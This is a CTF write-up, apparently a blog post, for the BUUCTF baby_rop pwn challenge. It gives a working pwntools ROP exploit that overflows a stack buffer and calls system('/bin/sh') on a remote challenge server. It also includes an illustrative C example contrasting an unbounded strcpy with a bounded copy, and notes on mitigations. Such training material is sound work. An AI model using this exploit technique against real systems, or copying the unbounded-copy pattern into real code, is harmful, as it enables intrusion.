BUUCTF (pwn) [HarekazeCTF2019] baby_rop

On x86-64 the first function argument is passed in a register rather than on the stack, so the address of the "/bin/sh" string has to be loaded into rdi (with a pop rdi gadget) before returning into system.

from pwn import *

p = remote("node3.buuoj.cn", 28711)
rdi = 0x400683   # "pop rdi; ret" gadget: pops the next qword of the chain into rdi (first argument)
sys = 0x4005e3   # system, as named in the writeup
bin = 0x601048   # address of the "/bin/sh" string
# 0x10 bytes of buffer plus 8 bytes of saved rbp, then the return address is overwritten
payload = b'a' * (0x10 + 8) + p64(rdi) + p64(bin) + p64(sys)
p.sendline(payload)
p.interactive()  # keep the connection open so the resulting shell can be used
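
The 0x10 + 8 padding above says what the overflowed frame looks like: a 16-byte stack buffer, the 8-byte saved rbp, then the return address. The C below is an added example written for this writeup, not the challenge's source: it reconstructs that kind of unbounded copy as a hypothetical, puts the bounded version beside it, and computes the return-address offset the chain relies on.

```c
#include <stdio.h>
#include <string.h>

/* Constructed example: a 16-byte buffer matches the writeup's 0x10 padding. */
#define BUF_SIZE 0x10

/* Hypothetical vulnerable pattern (assumed, not the challenge's code):
 * no length check, so input longer than BUF_SIZE runs over the saved rbp
 * and the return address, which is exactly what the ROP chain overwrites. */
int vulnerable_copy(char *dst, const char *src) {
    strcpy(dst, src);           /* unbounded copy into a fixed-size stack buffer */
    return (int)strlen(dst);
}

/* Hardened version: never writes more than dst_size bytes and reports
 * oversized input with -1 so the caller can reject it instead of running on. */
int bounded_copy(char *dst, size_t dst_size, const char *src) {
    size_t n = 0;
    while (n < dst_size && src[n] != '\0') {
        n++;
    }
    if (n >= dst_size) {
        return -1;              /* input (plus terminator) would not fit */
    }
    memcpy(dst, src, n + 1);    /* n bytes plus the NUL */
    return (int)n;
}

/* Bytes between the start of a buf_size buffer and the saved return address
 * on x86-64: the buffer, then the 8-byte saved rbp. For 0x10 this is 0x18,
 * the length of the 'a' padding in the writeup. */
size_t ret_addr_offset(size_t buf_size) {
    return buf_size + 8;
}

int main(void) {
    char buf[BUF_SIZE];
    printf("return address offset for a 0x%x buffer: 0x%zx\n",
           BUF_SIZE, ret_addr_offset(BUF_SIZE));
    printf("bounded_copy(\"hello\") -> %d\n", bounded_copy(buf, sizeof buf, "hello"));
    printf("bounded_copy(24 x 'a') -> %d\n",
           bounded_copy(buf, sizeof buf, "aaaaaaaaaaaaaaaaaaaaaaaa"));
    return 0;
}
```

The chain in the writeup also depends on the gadget, system and "/bin/sh" addresses being fixed (the 0x40xxxx addresses are those of a non-PIE binary) and on no stack canary sitting between the buffer and the saved rbp; either mitigation would break this layout.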

The flag is not in the root directory, so we need to search for it with find -name flag:

find -name "flag"



Origin blog.csdn.net/weixin_45556441/article/details/115298425